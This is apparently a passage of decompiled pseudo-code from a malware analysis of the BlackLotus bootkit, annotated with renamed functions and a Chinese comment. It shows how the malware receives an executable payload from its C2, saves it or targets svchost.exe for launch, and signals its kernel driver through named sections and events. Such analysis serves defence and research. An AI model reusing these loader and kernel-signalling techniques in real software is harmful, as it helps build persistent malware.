if ( NtQueryInformationToken(a1, TokenLinkedToken, &v4, 8u, &v3) >= 0 )
return v4.LinkedToken;
return (HANDLE)v1;
}
command_type2_140006BB0
void __fastcall command_type2_140006BB0(HttpST *httpst, WsValue *wsvalue, _DWORD *isSuccess)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
Heap = (ThreadParameter *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x40ui64);
v7 = Heap;
if ( Heap )
{
p_datasz = &Heap->datasz;
Data = getData_by_auth_token_140004108(httpst, wsvalue, &Heap->datasz);
v7->data = Data;
if ( !Data || !*p_datasz )
goto LABEL_12;
v10 = *wsvalue->Method;
*p_datasz = 0;
*(_WORD *)&v7->Method = v10;
v11 = isPEx86_140003C1C((__int64)Data, 0);
v7->cmdline = 0i64;
v7->isDll = 0;
v7->isX86 = v11;
FileType = wsvalue->FileType;
if ( *FileType != 'e' )
goto LABEL_8;
if ( FileType[1] == 'x' && FileType[2] == 'e' )
v13 = 1;
else
LABEL_8:
v13 = 0;
v7->isUser3or5 = 0;
v7->isEXE = v13;
if ( !v13 )
goto LABEL_12;
if ( *wsvalue->Method == '2' )
{
v14 = savefile_1400088C4(v7->data, 0, wsvalue);
v7->path = v14;
if ( !v14 )
{
LABEL_12:
free_140007354(v7);
return;
}
}
else
{
v15 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x208ui64);
v7->path = v15;
if ( !v15 )
goto LABEL_12;
*v7->path = ret_disk_drivenumber_140008000();
// :\Windows\System32\svchost.exe
v16 = x64svchost_14000B5E0;
if ( v7->isX86 )
// :\Windows\SysWOW64\svchost.exe
v16 = x86svchost_14000B620;
v17 = deobfuscate_wstring((WORD *)v16, 0x1Fu, 1);
wscat(v7->path, 260i64, (__int64)v17);
}
command_type3_140006B78(isSuccess);
if ( *isSuccess )
{
launch_14000691C(v7);
return;
}
goto LABEL_12;
}
}
command_type3_140006B78
__int64 __fastcall command_type3_140006B78(_DWORD *isSuccess)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
*(_DWORD *)v3.tag = 'U';
v3.datasz = 0;
*(_QWORD *)v3.data = 0i64;
result = evnet_section_2sys_1400082F0(&v3);
if ( (_DWORD)result )
*isSuccess = 1;
return result;
}
evnet_section_2sys_1400082F0
//与BlackLotus内核通信的数据结构,通过event 和Section 传递
struct sectiondata
{
char tag[4];
int datasz;
char data[8];
};
__int64 __fastcall evnet_section_2sys_1400082F0(sectiondata *data)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v1 = 0;
SectionHandle = 0i64;
Handle = 0i64;
ViewSize = 0i64;
BaseAddress = 0i64;
memset(name, 0, sizeof(name));
v3.QuadPart = (unsigned int)data->datasz + 16i64;
Timeout.QuadPart = -100000000i64;
MaximumSize = v3;
if ( (unsigned int)gen_BaseNamedObjects_machex_140008038(name) )// \BaseNamedObjects\xxxxxx
{
RtlInitUnicodeString(&DestinationString, name);
oatt.RootDirectory = 0i64;
oatt.ObjectName = &DestinationString;
oatt.Length = 48;
oatt.Attributes = 512;
*(_OWORD *)&oatt.SecurityDescriptor = 0i64;
if ( NtCreateSection(&SectionHandle, 0xF001Fu, &oatt, &MaximumSize, 4u, 0x8000000u, 0i64) >= 0
&& NtMapViewOfSection(
SectionHandle,
(HANDLE)0xFFFFFFFFFFFFFFFFi64,
&BaseAddress,
0i64,
0i64,
0i64,
&ViewSize,
ViewUnmap,
0,
4u) >= 0 )
{
strcpyWs_14000102C((char *)BaseAddress, (wchar_t *)data, (unsigned int)data->datasz + 16i64);
name[0x12] = 0x5A; // evnet-->\BaseNamedObjects\Zxxxxx
if ( NtCreateEvent(&Handle, 0x1F0003u, &oatt, NotificationEvent, 0) >= 0
&& !NtWaitForSingleObject(Handle, 1u, &Timeout) )
{
v1 = 1;
}
}
}
if ( BaseAddress )
NtUnmapViewOfSection((HANDLE)0xFFFFFFFFFFFFFFFFi64, BaseAddress);
if ( Handle )
NtClose(Handle);
if ( SectionHandle )
NtClose(SectionHandle);
return v1;
}